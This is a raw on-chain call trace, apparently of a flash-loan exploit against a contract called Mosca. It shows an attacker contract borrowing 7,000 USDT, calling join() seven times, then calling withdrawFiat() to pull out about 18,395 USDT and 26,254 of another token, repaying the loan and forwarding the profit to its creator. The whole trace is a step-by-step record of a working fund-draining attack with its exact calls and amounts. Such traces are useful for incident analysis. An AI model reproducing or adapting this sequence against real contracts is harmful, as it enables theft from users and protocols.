[1][CREATE] from=0xe763da, to=0x694950, atInversebrahint248() -> 0x608060
  [2][CREATE] from=0x694950, to=0xedcfa3, atInversebrahint248() -> 0x608060
    [3][CALL] from=0xedcfa3, to=BEP20USDT, approve(spender(address): 0xd8791F, amount(uint256): 115792089237316195423570985008687907853269...) -> True
  [2][CALL] from=0x694950, to=0xedcfa3, test() -> None
    [3][CALL] from=0xedcfa3, to=DPP, flashLoan(baseAmount(uint256): 0, quoteAmount(uint256): 7000000000000000000000, assetTo(address): 0xeDcfA3, data(bytes): b'0x') -> None
      [4][DELEGATECALL] from=DPP, to=DPP, flashLoan(baseAmount(uint256): 0, quoteAmount(uint256): 7000000000000000000000, assetTo(address): 0xeDcfA3, data(bytes): b'0x') -> None
        [5][CALL] from=DPP, to=BEP20USDT, transfer(recipient(address): 0xeDcfA3, amount(uint256): 7000000000000000000000) -> True
        [5][CALL] from=DPP, to=0xedcfa3, DPPFlashLoanCalladdress() -> None
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=Mosca, join(amount(uint256): 1000000000000000000000, _refCode(uint256): 0, fiat(uint8): 1, enterpriseJoin(bool): False) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xd8791F, amount(uint256): 991000000000000000000) -> True
            [7][CALL] from=Mosca, to=BEP20USDT, transferFrom(sender(address): 0xeDcfA3, recipient(address): 0xD7CFeE, amount(uint256): 9000000000000000000) -> True
          [6][STATICCALL] from=0xedcfa3, to=BEP20USDT, balanceOf(account(address): 0xd8791F) -> 18395252074171625860500
          [6][CALL] from=0xedcfa3, to=Mosca, withdrawFiat(amount(uint256): 18671180855284200248407, isFiat(bool): False, fiatToWithdraw(uint8): 1) -> None
            [7][CALL] from=Mosca, to=BEP20USDT, transfer(recipient(address): 0xeDcfA3, amount(uint256): 18395252074171625860499) -> True
          [6][STATICCALL] from=0xedcfa3, to=BEP20UpgradeableProxy, balanceOf(account(address): 0xd8791F) -> 26254200000000000000000
            [7][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, balanceOf(account(address): 0xd8791F) -> 26254200000000000000000
          [6][CALL] from=0xedcfa3, to=Mosca, withdrawFiat(amount(uint256): 26648013000000000000000, isFiat(bool): False, fiatToWithdraw(uint8): 0) -> None
            [7][CALL] from=Mosca, to=BEP20UpgradeableProxy, transfer(recipient(address): 0xeDcfA3, amount(uint256): 26254200000000000000000) -> True
              [8][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, transfer(recipient(address): 0xeDcfA3, amount(uint256): 26254200000000000000000) -> True
          [6][CALL] from=0xedcfa3, to=BEP20USDT, transfer(recipient(address): 0x6098A5, amount(uint256): 7000000000000000000000) -> True
          [6][STATICCALL] from=0xedcfa3, to=BEP20USDT, balanceOf(account(address): 0xeDcfA3) -> 11395252074171625860499
          [6][CALL] from=0xedcfa3, to=BEP20USDT, transfer(recipient(address): 0xE763DA, amount(uint256): 11395252074171625860499) -> True
          [6][STATICCALL] from=0xedcfa3, to=BEP20UpgradeableProxy, balanceOf(account(address): 0xeDcfA3) -> 26254200000000000000000
            [7][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, balanceOf(account(address): 0xeDcfA3) -> 26254200000000000000000
          [6][CALL] from=0xedcfa3, to=BEP20UpgradeableProxy, transfer(recipient(address): 0xE763DA, amount(uint256): 26254200000000000000000) -> True
            [7][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, transfer(recipient(address): 0xE763DA, amount(uint256): 26254200000000000000000) -> True
        [5][STATICCALL] from=DPP, to=WBNB, balanceOf((address): 0x6098A5) -> 242321616220426827935
        [5][STATICCALL] from=DPP, to=BEP20USDT, balanceOf(account(address): 0x6098A5) -> 252768744407906267874861
        [5][STATICCALL] from=DPP, to=WBNB, balanceOf((address): 0x6098A5) -> 242321616220426827935
        [5][STATICCALL] from=DPP, to=BEP20USDT, balanceOf(account(address): 0x6098A5) -> 252768744407906267874861
